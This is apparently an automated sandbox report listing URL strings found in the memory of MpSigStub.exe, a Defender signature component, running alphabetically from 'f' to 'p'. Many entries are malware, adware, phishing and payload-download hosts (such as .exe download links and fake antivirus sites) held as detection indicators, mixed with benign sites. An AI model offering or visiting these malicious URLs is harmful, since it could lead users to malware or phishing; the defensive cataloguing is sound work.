Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.flashempire.com/
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: http://www.flashkin.net
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: http://www.fopo.com.ar/thiscodewascreatedon
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.friend-card.com/pickup.aspx?code=
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.friend-greeting.net/pickup.aspx?code=
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.friendgreeting.com/pickup.aspx?code=
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp	String found in binary or memory: http://www.friskypotato.com/
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://www.friskypotato.com/codec/mp3/activecod3
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://www.g00gleadserver.com/list.txt
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://www.gamedanji.cn/ExeIni
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://www.general-insurance.net/wp-content/themes/general-ins-net/po
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.geocities.com/joke_haha2001
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://www.getip.pw
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://www.getpricefinder.com/
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.getsav-in.compublisheradpeak
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://www.gistery.trade/sys/designbolts.exe
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	String found in binary or memory: http://www.gnu.org/licenses/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://www.go2000.com/?4
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://www.go2000.com/?4aM
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://www.goldwindos2000.com/hkeraone/hker.htmwidht=0height=0
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://www.goldwindos2000.com/krratwo/hker.htm
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodtimesplayer.com/license.cgi?vidlock_params=
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.cn/search?complete=1&hl=zh-CN&inlang=zh-CN&newwindow=1&q=
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.cn/search?hl=zh-CN&q=
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.cn/search?q=%s
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com.br
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com.tr/
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web
Source: MpSigStub.exe, 00000024.00000003.6248346629.000001979504A000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrerMicrosoft
Source: MpSigStub.exe, 00000024.00000003.6229929208.0000019793FDC000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=webreferrercookienode.appendChild()
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://www.googleledal.com/traff1/go.php?sid=1
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.gooo.ru
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://www.gorillawalker.com
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp	String found in binary or memory: http://www.greenpartnership.jp
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://www.guzzotorino.it/ups-ship-notification
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://www.haibugmm.com/ba/yfctbzla
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://www.hao123.com/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://www.hao123.com/?tn=
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	String found in binary or memory: http://www.haosoft.net/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://www.hasandanalioglu.com/wp-content/n_v/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.hjsdffsfs.aonecommercial.com
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.hljcm.com/c
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://www.hoarafushionline.net/extractf.php?x=
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://www.hoarafushionline.net/habeys.exe
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.hohosearch.com/?ts=
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://www.hotbar.com
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://www.hotdutchporn.net/cb/scripts/getAddressFromIP.php?wmid=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://www.hotelelun.cl/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://www.htylk.esy.es/nobe/downloaddocument-adobesignin.html
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp	String found in binary or memory: http://www.hustler-exclusive.com/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: http://www.hxlive.cn
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://www.i-cash.de/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.iask.com/s?k=%s
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.icbc.com.cn/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.iciba.com/search?s=%s
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.idownline.com/members/idownline
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.imobile.com.cn/
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	String found in binary or memory: http://www.inet4you.com/exit/
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: http://www.infoaxe.com/enhancedsearchform.jsp
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.infoodesk.org/wizzy/wizzy/mailmine.html)
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: http://www.infotraffik-01.space/?
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.installmonetizer.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp	String found in binary or memory: http://www.instantmp3player.com
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip.com.cn/idcard.php?q=%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip.com.cn/ip.php?q=%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip.com.cn/mobile.php?q=%s
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip.com.cn/tel.php?q=%s
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip138.com
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip138.comx
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://www.ip2location.com/
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://www.ipvoips.com/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.isihodiernatunisi.com/online/zixmessage.htm)
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: http://www.istartsurf.com
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://www.itau.com.br
Source: MpSigStub.exe, 00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp	String found in binary or memory: http://www.j.mp/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://www.j.mp/ajdddsdiocsjcjosdj
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp	String found in binary or memory: http://www.jajaan.com/ip.asp
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://www.jejuseongahn.org/hboard4/data/cheditor/badu/alpha.php?v
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://www.jesuser.cn/plug/doSelect.asp?CMD=%s
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.joyo.com/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://www.jplineage.com/firo/mail.asp?tomail=163
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlinexl
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://www.jsonrpc.org/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://www.jword.jp/
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp	String found in binary or memory: http://www.key-logger.ws
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: http://www.klikspaandelft.nl/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.komikeglence.com/
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp	String found in binary or memory: http://www.kryogenix.org/code/browser/sorttable/
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp	String found in binary or memory: http://www.kssoftware.ch
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://www.kuku530.com/?
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://www.kuku530.com/?Favorites
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://www.lindenmontessori.com/cgi-bin/hr_9x/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.linkinc.es/scss/water.php
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp	String found in binary or memory: http://www.lis.eu
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://www.livecare.net/x
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://www.livejournal.com/search/?how=tm&area=default&q=%s
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://www.livejournal.com/search/?how=tm&area=default&q=%sx
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://www.lk2006.com/q15/index.htm
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.lollipop-network.com/privacy.php?lg=
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://www.look2me.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://www.look2me.com/
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://www.look2me.com/cgi
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://www.look2me.com/products/
Source: MpSigStub.exe, 00000024.00000003.6270214588.00000197A4657000.00000004.00000001.sdmp	String found in binary or memory: http://www.lop.com/search/
Source: MpSigStub.exe, 00000024.00000003.6270214588.00000197A4657000.00000004.00000001.sdmp	String found in binary or memory: http://www.lop.com/search/xa
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp	String found in binary or memory: http://www.luckbird8.cn/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://www.lumina.it/wp-content/plugins/all-in-one-wp-migration/storage/client/invoice-978561/
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://www.lwstats.com/11/
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.macadwarecleaner.com
Source: MpSigStub.exe, 00000024.00000003.6273173989.00000197A4452000.00000004.00000001.sdmp	String found in binary or memory: http://www.macromedia.com/go/getflashplayer
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://www.maicaidao.com
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: http://www.mail-kunren.jp/sample2018jb1e/index.html?src=
Source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp	String found in binary or memory: http://www.maliciousurl-695dba18-2bb9-429a-a9a6-fe89a0eb945e.com/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://www.manyakpc.com
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: http://www.mathrandomfloor/photo.txt?buttonnumdiskmlkjihgfed:
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://www.maxwebsearch.com/s?i_
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://www.mcmoney2012.com/fxf09.php
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://www.mediabusnetwork.com/phandler.php?pid=
Source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.mediafire.com/download/
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://www.meetchina.net/lib/html/index.php
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp	String found in binary or memory: http://www.megafileupload.com/
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	String found in binary or memory: http://www.megasesso.ittaskkill/f/imavp.exetaskkill/f/imavp.exetaskkill/f/imavp.exetaskkill/f/imavp.
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.mickyfastdl.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp	String found in binary or memory: http://www.microname.co.kr
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: http://www.mmviewer.com
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: http://www.mmviewer.com/post/
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://www.moliv.com.br/stat/email0702/
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp	String found in binary or memory: http://www.monitoreatufamilia.com
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp	String found in binary or memory: http://www.mootolola.com/
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://www.more4apps.com/
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp	String found in binary or memory: http://www.mp3codec.info
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://www.mp3codec.info/
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://www.mp3codec.net
Source: MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?pc=MSERT1
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://www.mt-download.com/mtrslib2.js
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://www.mva.by/tags/ariscanin1.e
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://www.my123.com/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://www.my8899.com/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://www.my_wallpaper_location.com/wallpaper.bmp
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	String found in binary or memory: http://www.myarmory.com/search/?Keywords=
Source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp	String found in binary or memory: http://www.mybrowserbar.com/cgi/coupons.cgi/
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://www.mydreamworld.50webs.com
Source: MpSigStub.exe, 00000024.00000003.6321140724.00000197A3AFC000.00000004.00000001.sdmp	String found in binary or memory: http://www.myfiledistribution.com/mfd.php
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://www.mymediacenter.in/crime/index.php
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://www.mypaymate.com/dialerplatform/tmp.htm
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://www.myyiso.com/internet/
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp	String found in binary or memory: http://www.nab.com.au
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://www.namu-in.com//bbs/data/init.htm
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://www.natwest.com/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: http://www.navegaki.com/?bd=sc&oem=cube&uid=maxtorxstm3250310as_6ry4hzd9xxxx6ry4hzd9&version=2.3.0.8
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://www.naver.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://www.navexcel.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://www.navexcel.com/
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://www.navsmart.info
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://www.navsmart.info/
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://www.nerddogueto.com.br
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://www.netfe.org/
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	String found in binary or memory: http://www.netxboy.com/
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	String found in binary or memory: http://www.netxboy.com/x
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://www.niepicowane.pl/
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp	String found in binary or memory: http://www.niudoudou.com/web/download/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://www.norton-kaspersky.com/trf/tools
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	String found in binary or memory: http://www.now.cn/?SCPMCID=
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.ntdlzone.com/download.php?
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.ntdlzone.com/download.php?xV
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp	String found in binary or memory: http://www.nubileones.com/members/
Source: MpSigStub.exe, 00000024.00000003.6273043144.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://www.nuevaq.fm
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://www.o2.co.uk/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://www.omniboxes.com/?type=sc&ts=1425313275&from=amt&uid=sandiskxsdssdhp256g_132567401149
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.onlinedown.net/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: http://www.onmylike.com/?utm_source=
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://www.orkut.com
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: http://www.oursurfing.com
Source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp	String found in binary or memory: http://www.papaping.com
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp	String found in binary or memory: http://www.paqtool.com/product/keylog/keylog_
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: http://www.paran-welfare.org/dokumente/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pasillorosa.com/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://www.pc-tune.ch/getip.php
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp	String found in binary or memory: http://www.pcbooster.com
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://www.pclady.com.cn/
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pcpurifier.com/buynow/?
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pcpurifier.com/renewal/?
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp	String found in binary or memory: http://www.pdefender2009.com/buy.php
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://www.phokhobazan.com/%202%200%201%208-0%207%20-%201%201%202%200%200%207:%202%206:%2099%20819.p
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp	String found in binary or memory: http://www.pinnaclemedicaltraining.com/invoice/
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://www.piram.com.br/hosts.txt
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: http://www.plustvarama.com
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://www.policiajudiciaria.pt/
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://www.pornpassmanager.com/d
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://www.powerdomein.nl/nld/administrator/backups/firewallc.exe
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: http://www.powernum123.com/download/
